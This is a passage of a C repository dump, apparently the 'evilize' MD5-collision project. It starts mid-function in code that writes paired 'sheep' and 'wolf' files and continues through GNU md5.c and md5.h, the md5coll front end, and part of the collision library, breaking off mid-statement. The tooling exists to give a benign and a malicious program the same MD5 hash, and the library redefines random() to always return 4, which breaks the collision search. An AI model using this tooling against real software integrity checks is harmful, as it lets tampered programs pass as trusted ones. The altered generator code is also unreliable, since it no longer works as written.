(ftell(fin)>pos+off && ftell(fin)<=pos+128+off){ ch_sheep=a[ftell(fin)-(pos+off)-1]; ch_wolf=b[ftell(fin)-(pos+off)-1]; } else{ ch_wolf=ch; ch_sheep=ch; } if (ftell(fin)>pos && ftell(fin)<=pos+192){ copybuf[i++]=ch_wolf; } //printf("Copybuf start: %d end: %d \n",pos+200,pos+200+192); if (ftell(fin)>pos+200 && i>0){ ch_wolf=copybuf[192-i]; ch_sheep=copybuf[192-i]; i--; } fputc(ch_sheep,fsheep); fputc(ch_wolf,fwolf); } fclose(fwolf); fclose(fsheep); fclose(fin); return 0; } ================================================ FILE: evilize/md5.c ================================================ /* md5.c - Functions to compute MD5 message digest of files or memory blocks according to the definition of MD5 in RFC 1321 from April 1992. Copyright (C) 1995, 1996, 1997 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with the GNU C Library; see the file COPYING.LIB. If not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* Written by Ulrich Drepper , 1995. */ #ifdef HAVE_CONFIG_H # include #endif #include #if STDC_HEADERS || defined _LIBC # include # include #else # ifndef HAVE_MEMCPY # define memcpy(d, s, n) bcopy ((s), (d), (n)) # endif #endif #include "md5.h" #ifdef _LIBC # include # if __BYTE_ORDER == __BIG_ENDIAN # define WORDS_BIGENDIAN 1 # endif /* We need to keep the namespace clean so define the MD5 function protected using leading __ and use weak aliases. */ # define md5_init_ctx __md5_init_ctx # define md5_process_block __md5_process_block # define md5_process_bytes __md5_process_bytes # define md5_finish_ctx __md5_finish_ctx # define md5_read_ctx __md5_read_ctx # define md5_stream __md5_stream # define md5_buffer __md5_buffer #endif #ifdef WORDS_BIGENDIAN # define SWAP(n) \ (((n) << 24) | (((n) & 0xff00) << 8) | (((n) >> 8) & 0xff00) | ((n) >> 24)) #else # define SWAP(n) (n) #endif /* This array contains the bytes used to pad the buffer to the next 64-byte boundary. (RFC 1321, 3.1: Step 1) */ static const unsigned char fillbuf[64] = { 0x80, 0 /* , 0, 0, ... */ }; /* Initialize structure containing state of computation. (RFC 1321, 3.3: Step 3) */ void md5_init_ctx (ctx) struct md5_ctx *ctx; { ctx->A = 0x67452301; ctx->B = 0xefcdab89; ctx->C = 0x98badcfe; ctx->D = 0x10325476; ctx->total[0] = ctx->total[1] = 0; ctx->buflen = 0; } /* Put result from CTX in first 16 bytes following RESBUF. The result must be in little endian byte order. IMPORTANT: On some systems it is required that RESBUF is correctly aligned for a 32 bits value. */ void * md5_read_ctx (ctx, resbuf) const struct md5_ctx *ctx; void *resbuf; { ((md5_uint32 *) resbuf)[0] = SWAP (ctx->A); ((md5_uint32 *) resbuf)[1] = SWAP (ctx->B); ((md5_uint32 *) resbuf)[2] = SWAP (ctx->C); ((md5_uint32 *) resbuf)[3] = SWAP (ctx->D); return resbuf; } /* Process the remaining bytes in the internal buffer and the usual prolog according to the standard and write the result to RESBUF. IMPORTANT: On some systems it is required that RESBUF is correctly aligned for a 32 bits value. */ void * md5_finish_ctx (ctx, resbuf) struct md5_ctx *ctx; void *resbuf; { /* Take yet unprocessed bytes into account. */ md5_uint32 bytes = ctx->buflen; size_t pad; /* Now count remaining bytes. */ ctx->total[0] += bytes; if (ctx->total[0] < bytes) ++ctx->total[1]; pad = bytes >= 56 ? 64 + 56 - bytes : 56 - bytes; memcpy (&ctx->buffer[bytes], fillbuf, pad); /* Put the 64-bit file length in *bits* at the end of the buffer. */ *(md5_uint32 *) &ctx->buffer[bytes + pad] = SWAP (ctx->total[0] << 3); *(md5_uint32 *) &ctx->buffer[bytes + pad + 4] = SWAP ((ctx->total[1] << 3) | (ctx->total[0] >> 29)); /* Process last bytes. */ md5_process_block (ctx->buffer, bytes + pad + 8, ctx); return md5_read_ctx (ctx, resbuf); } /* Compute MD5 message digest for bytes read from STREAM. The resulting message digest number will be written into the 16 bytes beginning at RESBLOCK. */ int md5_stream (stream, resblock) FILE *stream; void *resblock; { /* Important: BLOCKSIZE must be a multiple of 64. */ #define BLOCKSIZE 4096 struct md5_ctx ctx; char buffer[BLOCKSIZE + 72]; size_t sum; /* Initialize the computation context. */ md5_init_ctx (&ctx); /* Iterate over full file contents. */ while (1) { /* We read the file in blocks of BLOCKSIZE bytes. One call of the computation function processes the whole buffer so that with the next round of the loop another block can be read. */ size_t n; sum = 0; /* Read block. Take care for partial reads. */ do { n = fread (buffer + sum, 1, BLOCKSIZE - sum, stream); sum += n; } while (sum < BLOCKSIZE && n != 0); if (n == 0 && ferror (stream)) return 1; /* If end of file is reached, end the loop. */ if (n == 0) break; /* Process buffer with BLOCKSIZE bytes. Note that BLOCKSIZE % 64 == 0 */ md5_process_block (buffer, BLOCKSIZE, &ctx); } /* Add the last bytes if necessary. */ if (sum > 0) md5_process_bytes (buffer, sum, &ctx); /* Construct result in desired memory. */ md5_finish_ctx (&ctx, resblock); return 0; } /* Compute MD5 message digest for LEN bytes beginning at BUFFER. The result is always in little endian byte order, so that a byte-wise output yields to the wanted ASCII representation of the message digest. */ void * md5_buffer (buffer, len, resblock) const char *buffer; size_t len; void *resblock; { struct md5_ctx ctx; /* Initialize the computation context. */ md5_init_ctx (&ctx); /* Process whole buffer but last len % 64 bytes. */ md5_process_bytes (buffer, len, &ctx); /* Put result in desired memory area. */ return md5_finish_ctx (&ctx, resblock); } void md5_process_bytes (buffer, len, ctx) const void *buffer; size_t len; struct md5_ctx *ctx; { /* When we already have some bits in our internal buffer concatenate both inputs first. */ if (ctx->buflen != 0) { size_t left_over = ctx->buflen; size_t add = 128 - left_over > len ? len : 128 - left_over; memcpy (&ctx->buffer[left_over], buffer, add); ctx->buflen += add; if (left_over + add > 64) { md5_process_block (ctx->buffer, (left_over + add) & ~63, ctx); /* The regions in the following copy operation cannot overlap. */ memcpy (ctx->buffer, &ctx->buffer[(left_over + add) & ~63], (left_over + add) & 63); ctx->buflen = (left_over + add) & 63; } buffer = (const char *) buffer + add; len -= add; } /* Process available complete blocks. */ if (len > 64) { md5_process_block (buffer, len & ~63, ctx); buffer = (const char *) buffer + (len & ~63); len &= 63; } /* Move remaining bytes in internal buffer. */ if (len > 0) { memcpy (ctx->buffer, buffer, len); ctx->buflen = len; } } /* These are the four functions used in the four steps of the MD5 algorithm and defined in the RFC 1321. The first function is a little bit optimized (as found in Colin Plumbs public domain implementation). */ /* #define FF(b, c, d) ((b & c) | (~b & d)) */ #define FF(b, c, d) (d ^ (b & (c ^ d))) #define FG(b, c, d) FF (d, b, c) #define FH(b, c, d) (b ^ c ^ d) #define FI(b, c, d) (c ^ (b | ~d)) /* Process LEN bytes of BUFFER, accumulating context into CTX. It is assumed that LEN % 64 == 0. */ void md5_process_block (buffer, len, ctx) const void *buffer; size_t len; struct md5_ctx *ctx; { md5_uint32 correct_words[16]; const md5_uint32 *words = buffer; size_t nwords = len / sizeof (md5_uint32); const md5_uint32 *endp = words + nwords; md5_uint32 A = ctx->A; md5_uint32 B = ctx->B; md5_uint32 C = ctx->C; md5_uint32 D = ctx->D; /* First increment the byte count. RFC 1321 specifies the possible length of the file up to 2^64 bits. Here we only compute the number of bytes. Do a double word increment. */ ctx->total[0] += len; if (ctx->total[0] < len) ++ctx->total[1]; /* Process all bytes in the buffer with 64 bytes in each round of the loop. */ while (words < endp) { md5_uint32 *cwp = correct_words; md5_uint32 A_save = A; md5_uint32 B_save = B; md5_uint32 C_save = C; md5_uint32 D_save = D; /* First round: using the given function, the context and a constant the next context is computed. Because the algorithms processing unit is a 32-bit word and it is determined to work on words in little endian byte order we perhaps have to change the byte order before the computation. To reduce the work for the next steps we store the swapped words in the array CORRECT_WORDS. */ #define OP(a, b, c, d, s, T) \ do \ { \ a += FF (b, c, d) + (*cwp++ = SWAP (*words)) + T; \ ++words; \ CYCLIC (a, s); \ a += b; \ } \ while (0) /* It is unfortunate that C does not provide an operator for cyclic rotation. Hope the C compiler is smart enough. */ #define CYCLIC(w, s) (w = (w << s) | (w >> (32 - s))) /* Before we start, one word to the strange constants. They are defined in RFC 1321 as T[i] = (int) (4294967296.0 * fabs (sin (i))), i=1..64 */ /* Round 1. */ OP (A, B, C, D, 7, 0xd76aa478); OP (D, A, B, C, 12, 0xe8c7b756); OP (C, D, A, B, 17, 0x242070db); OP (B, C, D, A, 22, 0xc1bdceee); OP (A, B, C, D, 7, 0xf57c0faf); OP (D, A, B, C, 12, 0x4787c62a); OP (C, D, A, B, 17, 0xa8304613); OP (B, C, D, A, 22, 0xfd469501); OP (A, B, C, D, 7, 0x698098d8); OP (D, A, B, C, 12, 0x8b44f7af); OP (C, D, A, B, 17, 0xffff5bb1); OP (B, C, D, A, 22, 0x895cd7be); OP (A, B, C, D, 7, 0x6b901122); OP (D, A, B, C, 12, 0xfd987193); OP (C, D, A, B, 17, 0xa679438e); OP (B, C, D, A, 22, 0x49b40821); /* For the second to fourth round we have the possibly swapped words in CORRECT_WORDS. Redefine the macro to take an additional first argument specifying the function to use. */ #undef OP #define OP(f, a, b, c, d, k, s, T) \ do \ { \ a += f (b, c, d) + correct_words[k] + T; \ CYCLIC (a, s); \ a += b; \ } \ while (0) /* Round 2. */ OP (FG, A, B, C, D, 1, 5, 0xf61e2562); OP (FG, D, A, B, C, 6, 9, 0xc040b340); OP (FG, C, D, A, B, 11, 14, 0x265e5a51); OP (FG, B, C, D, A, 0, 20, 0xe9b6c7aa); OP (FG, A, B, C, D, 5, 5, 0xd62f105d); OP (FG, D, A, B, C, 10, 9, 0x02441453); OP (FG, C, D, A, B, 15, 14, 0xd8a1e681); OP (FG, B, C, D, A, 4, 20, 0xe7d3fbc8); OP (FG, A, B, C, D, 9, 5, 0x21e1cde6); OP (FG, D, A, B, C, 14, 9, 0xc33707d6); OP (FG, C, D, A, B, 3, 14, 0xf4d50d87); OP (FG, B, C, D, A, 8, 20, 0x455a14ed); OP (FG, A, B, C, D, 13, 5, 0xa9e3e905); OP (FG, D, A, B, C, 2, 9, 0xfcefa3f8); OP (FG, C, D, A, B, 7, 14, 0x676f02d9); OP (FG, B, C, D, A, 12, 20, 0x8d2a4c8a); /* Round 3. */ OP (FH, A, B, C, D, 5, 4, 0xfffa3942); OP (FH, D, A, B, C, 8, 11, 0x8771f681); OP (FH, C, D, A, B, 11, 16, 0x6d9d6122); OP (FH, B, C, D, A, 14, 23, 0xfde5380c); OP (FH, A, B, C, D, 1, 4, 0xa4beea44); OP (FH, D, A, B, C, 4, 11, 0x4bdecfa9); OP (FH, C, D, A, B, 7, 16, 0xf6bb4b60); OP (FH, B, C, D, A, 10, 23, 0xbebfbc70); OP (FH, A, B, C, D, 13, 4, 0x289b7ec6); OP (FH, D, A, B, C, 0, 11, 0xeaa127fa); OP (FH, C, D, A, B, 3, 16, 0xd4ef3085); OP (FH, B, C, D, A, 6, 23, 0x04881d05); OP (FH, A, B, C, D, 9, 4, 0xd9d4d039); OP (FH, D, A, B, C, 12, 11, 0xe6db99e5); OP (FH, C, D, A, B, 15, 16, 0x1fa27cf8); OP (FH, B, C, D, A, 2, 23, 0xc4ac5665); /* Round 4. */ OP (FI, A, B, C, D, 0, 6, 0xf4292244); OP (FI, D, A, B, C, 7, 10, 0x432aff97); OP (FI, C, D, A, B, 14, 15, 0xab9423a7); OP (FI, B, C, D, A, 5, 21, 0xfc93a039); OP (FI, A, B, C, D, 12, 6, 0x655b59c3); OP (FI, D, A, B, C, 3, 10, 0x8f0ccc92); OP (FI, C, D, A, B, 10, 15, 0xffeff47d); OP (FI, B, C, D, A, 1, 21, 0x85845dd1); OP (FI, A, B, C, D, 8, 6, 0x6fa87e4f); OP (FI, D, A, B, C, 15, 10, 0xfe2ce6e0); OP (FI, C, D, A, B, 6, 15, 0xa3014314); OP (FI, B, C, D, A, 13, 21, 0x4e0811a1); OP (FI, A, B, C, D, 4, 6, 0xf7537e82); OP (FI, D, A, B, C, 11, 10, 0xbd3af235); OP (FI, C, D, A, B, 2, 15, 0x2ad7d2bb); OP (FI, B, C, D, A, 9, 21, 0xeb86d391); /* Add the starting values of the context. */ A += A_save; B += B_save; C += C_save; D += D_save; } /* Put checksum in context given as argument. */ ctx->A = A; ctx->B = B; ctx->C = C; ctx->D = D; } #ifdef _LIBC /* Define weak aliases. */ # undef md5_init_ctx weak_alias (__md5_init_ctx, md5_init_ctx) # undef md5_process_block weak_alias (__md5_process_block, md5_process_block) # undef md5_process_bytes weak_alias (__md5_process_bytes, md5_process_bytes) # undef md5_finish_ctx weak_alias (__md5_finish_ctx, md5_finish_ctx) # undef md5_read_ctx weak_alias (__md5_read_ctx, md5_read_ctx) # undef md5_stream weak_alias (__md5_stream, md5_stream) # undef md5_buffer weak_alias (__md5_buffer, md5_buffer) #endif ================================================ FILE: evilize/md5.h ================================================ /* Declaration of functions and data types used for MD5 sum computing library functions. Copyright (C) 1995, 1996, 1997 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with the GNU C Library; see the file COPYING.LIB. If not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #ifndef _MD5_H #define _MD5_H 1 #include #if defined HAVE_LIMITS_H || _LIBC # include #endif /* The following contortions are an attempt to use the C preprocessor to determine an unsigned integral type that is 32 bits wide. An alternative approach is to use autoconf's AC_CHECK_SIZEOF macro, but doing that would require that the configure script compile and *run* the resulting executable. Locally running cross-compiled executables is usually not possible. */ #ifdef _LIBC # include typedef u_int32_t md5_uint32; #else # if defined __STDC__ && __STDC__ # define UINT_MAX_32_BITS 4294967295U # else # define UINT_MAX_32_BITS 0xFFFFFFFF # endif /* If UINT_MAX isn't defined, assume it's a 32-bit type. This should be valid for all systems GNU cares about because that doesn't include 16-bit systems, and only modern systems (that certainly have ) have 64+-bit integral types. */ # ifndef UINT_MAX # define UINT_MAX UINT_MAX_32_BITS # endif # if UINT_MAX == UINT_MAX_32_BITS typedef unsigned int md5_uint32; # else # if USHRT_MAX == UINT_MAX_32_BITS typedef unsigned short md5_uint32; # else # if ULONG_MAX == UINT_MAX_32_BITS typedef unsigned long md5_uint32; # else /* The following line is intended to evoke an error. Using #error is not portable enough. */ "Cannot determine unsigned 32-bit data type." # endif # endif # endif #endif #undef __P #if defined (__STDC__) && __STDC__ # define __P(x) x #else # define __P(x) () #endif /* Structure to save state of computation between the single steps. */ struct md5_ctx { md5_uint32 A; md5_uint32 B; md5_uint32 C; md5_uint32 D; md5_uint32 total[2]; md5_uint32 buflen; char buffer[128]; }; /* * The following three functions are build up the low level used in * the functions `md5_stream' and `md5_buffer'. */ /* Initialize structure containing state of computation. (RFC 1321, 3.3: Step 3) */ extern void __md5_init_ctx __P ((struct md5_ctx *ctx)); extern void md5_init_ctx __P ((struct md5_ctx *ctx)); /* Starting with the result of former calls of this function (or the initialization function update the context for the next LEN bytes starting at BUFFER. It is necessary that LEN is a multiple of 64!!! */ extern void __md5_process_block __P ((const void *buffer, size_t len, struct md5_ctx *ctx)); extern void md5_process_block __P ((const void *buffer, size_t len, struct md5_ctx *ctx)); /* Starting with the result of former calls of this function (or the initialization function update the context for the next LEN bytes starting at BUFFER. It is NOT required that LEN is a multiple of 64. */ extern void __md5_process_bytes __P ((const void *buffer, size_t len, struct md5_ctx *ctx)); extern void md5_process_bytes __P ((const void *buffer, size_t len, struct md5_ctx *ctx)); /* Process the remaining bytes in the buffer and put result from CTX in first 16 bytes following RESBUF. The result is always in little endian byte order, so that a byte-wise output yields to the wanted ASCII representation of the message digest. IMPORTANT: On some systems it is required that RESBUF is correctly aligned for a 32 bits value. */ extern void *__md5_finish_ctx __P ((struct md5_ctx *ctx, void *resbuf)); extern void *md5_finish_ctx __P ((struct md5_ctx *ctx, void *resbuf)); /* Put result from CTX in first 16 bytes following RESBUF. The result is always in little endian byte order, so that a byte-wise output yields to the wanted ASCII representation of the message digest. IMPORTANT: On some systems it is required that RESBUF is correctly aligned for a 32 bits value. */ extern void *__md5_read_ctx __P ((const struct md5_ctx *ctx, void *resbuf)); extern void *md5_read_ctx __P ((const struct md5_ctx *ctx, void *resbuf)); /* Compute MD5 message digest for bytes read from STREAM. The resulting message digest number will be written into the 16 bytes beginning at RESBLOCK. */ extern int __md5_stream __P ((FILE *stream, void *resblock)); /* Compute MD5 message digest for LEN bytes beginning at BUFFER. The result is always in little endian byte order, so that a byte-wise output yields to the wanted ASCII representation of the message digest. */ extern void *__md5_buffer __P ((const char *buffer, size_t len, void *resblock)); extern void *md5_buffer __P ((const char *buffer, size_t len, void *resblock)); #endif /* md5.h */ ================================================ FILE: evilize/md5coll.c ================================================ /* MD5 Collision Generator * Copyright (C) 2005 Patrick Stach . * Implementation of paper by Xiaoyun Wang, et al. * A few optimizations to make the solving method a bit more deterministic. * Modifications Copyright (C) 2006 Peter Selinger. * * This work is licensed under a modified BSD License, see the file * MBSD-LICENSE for full details. * Any derivative works or references must cite the authors. */ /* * Changes: * 2006/02/07: Peter Selinger - separated user interface from library * 2006/02/07: Peter Selinger - progress reports * 2006/02/07: Peter Selinger - added options -h, -V, -q, -s * * Usage: see ./md5coll --help * * Notes: Requires being built as 32 bit (unsigned int as 32 bit) */ /* This file contains the user interface (mainly parsing of command-line). The real work is done in md5coll_lib. */ #include #include #include #include #include #include "md5coll_lib.h" #define NAME "md5coll" /* print usage information */ static void usage(FILE *fout) { fprintf(fout, "%s %s. MD5 collision generator.\n", NAME, MD5COLL_VERSION); fprintf(fout, "\n"); fprintf(fout, "Usage: %s [options] [IV0 IV1 IV2 IV3]\n", NAME); fprintf(fout, "Arguments (optional):\n" " IV0 IV1 IV2 IV3 four initial vectors in format 0x00000000\n" "Options:\n" " -h, --help print this help message and exit\n" " -L, --license print license info and exit\n" " -V, --version print version info and exit\n" " -q, --quiet suppress progress information\n" " -s, --seed seed the random number generator\n" ); } /* print version information */ static void version(FILE *fout) { fprintf(fout, "%s %s. MD5 collision generator.\n", NAME, MD5COLL_VERSION); fprintf(fout, "Copyright (C) 2005 Patrick Stach .\n"); fprintf(fout, "Implementation of paper by Xiaoyun Wang, et al.\n"); fprintf(fout, "Modifications Copyright (C) 2006 Peter Selinger.\n"); } /* print license information */ static void license(FILE *fout) { fprintf(fout, "%s %s. MD5 collision generator.\n", NAME, MD5COLL_VERSION); fprintf(fout, "Copyright (C) 2005 Patrick Stach .\n"); fprintf(fout, "Implementation of paper by Xiaoyun Wang, et al.\n"); fprintf(fout, "Modifications Copyright (C) 2006 Peter Selinger.\n"); fprintf(fout, "\n"); fprintf(fout, "Redistribution and use in source and binary forms, with or without\n" "modification, are permitted provided that the following conditions are\n" "met:\n" "\n" "1. Redistributions of source code must retain the above copyright\n" " notice, this list of conditions and the following disclaimer.\n" "2. Redistributions in binary form must reproduce the above copyright\n" " notice, this list of conditions and the following disclaimer in the\n" " documentation and/or other materials provided with the distribution.\n" "3. The name of the author may not be used to endorse or promote\n" " products derived from this software without specific prior written\n" " permission.\n" "\n" "THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n" "IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n" "WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n" "DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,\n" "INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n" "(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n" "SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n" "HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n" "STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING\n" "IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n" "POSSIBILITY OF SUCH DAMAGE.\n"); } static struct option longopts[] = { {"help", 0, 0, 'h'}, {"license", 0, 0, 'L'}, {"version", 0, 0, 'V'}, {"quiet", 0, 0, 'q'}, {"seed", 1, 0, 's'}, {0, 0, 0, 0} }; static char *shortopts = "hLVqs:"; #define COL0 "\033[G" #define CTLK "\033[K" static int progress_printer_f(void *priv, char *arg) { fprintf(stderr, ""COL0"Progress: %s"CTLK"", arg); fflush(stderr); return 0; } static callback_t progress_printer = { &progress_printer_f, NULL}; /* write special purpose format file, compatible with md5coll. */ static void write_collision_file(FILE *fout, unsigned int m0[32], unsigned int m1[32]) { int i; fprintf(fout, "unsigned int m0[32] = {\n"); for (i=0; i<32; i++) { fprintf(fout, "0x%08x, ", m0[i]); if ((i & 3) == 3) { fprintf(fout, "\n"); } } fprintf(fout, "};\n\n"); fprintf(fout, "unsigned int m1[32] = {\n"); for (i=0; i<32; i++) { fprintf(fout, "0x%08x, ", m1[i]); if ((i & 3) == 3) { fprintf(fout, "\n"); } } fprintf(fout, "};\n\n"); return; } int main(int ac, char *av[]) { unsigned int m0[32]; unsigned int m1[32]; int c, count; callback_t *cb; /* command line options */ int have_iv = 0; unsigned int IV[4]; int quiet = 0; unsigned int seed = time(NULL) ^ (getpid() << 16); /* process command line options */ while ((c = getopt_long(ac, av, shortopts, longopts, NULL)) != -1) { switch (c) { case 'h': usage(stdout); exit(0); break; case 'L': license(stdout); exit(0); break; case 'V': version(stdout); exit(0); break; case 'q': quiet = 1; break; case 's': seed = strtoul(optarg, NULL, 0); break; case '?': fprintf(stderr, "Try --help for more information.\n"); exit(1); break; } } count = ac-optind; if (count == 4) { IV[0] = strtoul(av[optind], NULL, 0); IV[1] = strtoul(av[optind+1], NULL, 0); IV[2] = strtoul(av[optind+2], NULL, 0); IV[3] = strtoul(av[optind+3], NULL, 0); have_iv = 1; } else if (count == 0) { have_iv = 0; } else { fprintf(stderr, "%s: wrong number of arguments. Try --help for more information.\n", NAME); exit(1); } /* end command line options */ if (quiet) { cb = NULL; } else { cb = &progress_printer; fprintf(stdout, "Random seed: %u\n", seed); } srandom(seed); if (have_iv) { md5coll_with_iv(IV, m0, m1, cb); } else { md5coll(m0, m1, cb); } if (cb) { fprintf(stderr, " (done)\n"); /* finish progress display */ } write_collision_file(stdout, m0, m1); return 0; } ================================================ FILE: evilize/md5coll_lib.c ================================================ /* MD5 Collision Generator * Copyright (C) 2005 Patrick Stach . * Implementation of paper by Xiaoyun Wang, et al. * A few optimizations to make the solving method a bit more deterministic. * Modifications Copyright (C) 2006 Peter Selinger. * * This work is licensed under a modified BSD License, see the file * MBSD-LICENSE for full details. * Any derivative works or references must cite the authors. */ /* * Changes: * 2006/02/09: Peter Selinger - added emergency exit to block2 * 2006/02/07: Peter Selinger - converted to linkable library * 2006/02/07: Peter Selinger - added progress report feature * * Notes: * - this library is not reentrant; state "s" is global. This * is about 10% faster than using a dynamic state. * - Requires being built as 32 bit (unsigned int as 32 bit) */ #include /* for random() */ #include /* for memcpy() */ #include #include "md5coll_lib.h" #define F(x, y, z) (z ^ (x & (y ^ z))) #define G(x, y, z) F(z, x, y) #define H(x, y, z) (x ^ y ^ z) #define I(x, y, z) (y ^ (x | ~z)) #define RL(x, y) (((x) << (y)) | ((x) >> (32 - (y)))) #define RR(x, y) (((x) >> (y)) | ((x) << (32 - (y)))) #define LOOP_11 300 #define LOOP_12 0x20000000 #define LOOP_21 1000 #define LOOP_22 0x4000000 struct state_s { unsigned int A0, B0, C0, D0; unsigned int A1, B1, C1, D1; unsigned int Q0[65], Q1[65]; unsigned int X0[32], X1[32]; int ct1, ct2; }; typedef struct state_s state_t; static state_t s; static unsigned int IV_default[4] = { 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476 }; static inline int callback2(callback_t *cb, int a, int b) { char buf[80]; sprintf(buf, "%d.%d", a, b); return cb->f(cb->priv, buf); } static inline int callback4(callback_t *cb, int a, int b, int c, int d) { char buf[80]; sprintf(buf, "%d.%d.%d.%d", a, b, c, d); return cb->f(cb->priv, buf); } int random(){ return 4; } /* return 0 on success, 1 on interrupt */ int block1(unsigned int IV[4], callback_t *cb, int ct1) { int i; block1_again: for(;;) { /* C1 */ s.Q0[ 3] = random() & ~0x00800040; s.Q1[ 3] = s.Q0[ 3]; /* B1 */ s.Q0[ 4] = (random() | 0x80080800) & ~(0x00800040 | 0x0077f780); s.Q0[ 4] |= (s.Q0[ 3] & 0x0077f780); s.Q1[ 4] = s.Q0[ 4]; /* A2 */ s.Q0[ 5] = (random() | 0x88400025) & ~0x02bfffc0; s.Q1[ 5] = s.Q0[ 5] - 0x00000040; /* D2 */ s.Q0[ 6] = (random() | 0x027fbc41) & ~(0x888043a4 | 0x7500001a); s.Q0[ 6] |= (s.Q0[ 5] & 0x7500001a); s.Q1[ 6] = s.Q0[ 6] - 0x7f800040; /* C2 */ s.Q0[ 7] = (random() | 0x03fef820) & ~0xfc0107df; s.Q1[ 7] = s.Q0[ 7] - 0x07800041; s.X0[ 6] = RR(s.Q0[ 7] - s.Q0[ 6], 17) - F(s.Q0[ 6], s.Q0[ 5], s.Q0[ 4]) - s.Q0[ 3] - 0xa8304613; s.X1[ 6] = RR(s.Q1[ 7] - s.Q1[ 6], 17) - F(s.Q1[ 6], s.Q1[ 5], s.Q1[ 4]) - s.Q1[ 3] - 0xa8304613; if(s.X0[ 6] != s.X1[ 6]) continue; /* B2 */ s.Q0[ 8] = (random() | 0x01910540) & ~0xfe0eaabf; s.Q1[ 8] = s.Q0[ 8] - 0x00827fff; s.X0[ 7] = RR(s.Q0[ 8] - s.Q0[ 7], 22) - F(s.Q0[ 7], s.Q0[ 6], s.Q0[ 5]) - s.Q0[ 4] - 0xfd469501; s.X1[ 7] = RR(s.Q1[ 8] - s.Q1[ 7], 22) - F(s.Q1[ 7], s.Q1[ 6], s.Q1[ 5]) - s.Q1[ 4] - 0xfd469501; if(s.X0[ 7] != s.X1[ 7]) continue; /* A3 */ s.Q0[ 9] = (random() | 0xfb102f3d) & ~(0x040f80c2 | 0x00001000); s.Q0[ 9] |= (s.Q0[ 8] & 0x00001000); s.Q1[ 9] = s.Q0[ 9] - 0x8000003f; s.X0[ 8] = RR(s.Q0[ 9] - s.Q0[ 8], 7) - F(s.Q0[ 8], s.Q0[ 7], s.Q0[ 6]) - s.Q0[ 5] - 0x698098d8; s.X1[ 8] = RR(s.Q1[ 9] - s.Q1[ 8], 7) - F(s.Q1[ 8], s.Q1[ 7], s.Q1[ 6]) - s.Q1[ 5] - 0x698098d8; if(s.X0[ 8] != s.X1[ 8]) continue; /* D3 */ s.Q0[10] = (random() | 0x401f9040) & ~0x80802183; s.Q1[10] = s.Q0[10] - 0x7ffff000; s.X0[ 9] = RR(s.Q0[10] - s.Q0[ 9], 12) - F(s.Q0[ 9], s.Q0[ 8], s.Q0[ 7]) - s.Q0[ 6] - 0x8b44f7af; s.X1[ 9] = RR(s.Q1[10] - s.Q1[ 9], 12) - F(s.Q1[ 9], s.Q1[ 8], s.Q1[ 7]) - s.Q1[ 6] - 0x8b44f7af; if(s.X0[ 9] != s.X1[ 9]) continue; /* C3 */ s.Q0[11] = (random() | 0x000180c2) & ~(0xc00e3101 | 0x00004000); s.Q0[11] |= (s.Q0[10] & 0x00004000); s.Q1[11] = s.Q0[11] - 0x40000000; s.X0[10] = RR(s.Q0[11] - s.Q0[10], 17) - F(s.Q0[10], s.Q0[ 9], s.Q0[ 8]) - s.Q0[ 7] - 0xffff5bb1; s.X1[10] = RR(s.Q1[11] - s.Q1[10], 17) - F(s.Q1[10], s.Q1[ 9], s.Q1[ 8]) - s.Q1[ 7] - 0xffff5bb1; if(s.X0[10] != s.X1[10]) continue; /* B3 */ s.Q0[12] = (random() | 0x00081100) & ~(0xc007e080 | 0x03000000); s.Q0[12] |= (s.Q0[11] & 0x03000000); s.Q1[12] = s.Q0[12] - 0x80002080; s.X0[11] = RR(s.Q0[12] - s.Q0[11], 22) - F(s.Q0[11], s.Q0[10], s.Q0[ 9]) - s.Q0[ 8] - 0x895cd7be; s.X1[11] = RR(s.Q1[12] - s.Q1[11], 22) - F(s.Q1[11], s.Q1[10], s.Q1[ 9]) - s.Q1[ 8] - 0x895cd7be; if((s.X0[11] ^ s.X1[11]) != 0x00008000) continue; /* A4 */ s.Q0[13] = (random() | 0x410fe008) & ~0x82000180; s.Q1[13] = s.Q0[13] - 0x7f000000; s.X0[12] = RR(s.Q0[13] - s.Q0[12], 7) - F(s.Q0[12], s.Q0[11], s.Q0[10]) - s.Q0[ 9] - 0x6b901122; s.X1[12] = RR(s.Q1[13] - s.Q1[12], 7) - F(s.Q1[12], s.Q1[11], s.Q1[10]) - s.Q1[ 9] - 0x6b901122; if(s.X0[12] != s.X1[12]) continue; /* D4 */ s.Q0[14] = (random() | 0x000be188) & ~0xa3040000; s.Q1[14] = s.Q0[14] - 0x80000000; s.X0[13] = RR(s.Q0[14] - s.Q0[13], 12) - F(s.Q0[13], s.Q0[12], s.Q0[11]) - s.Q0[10] - 0xfd987193; s.X1[13] = RR(s.Q1[14] - s.Q1[13], 12) - 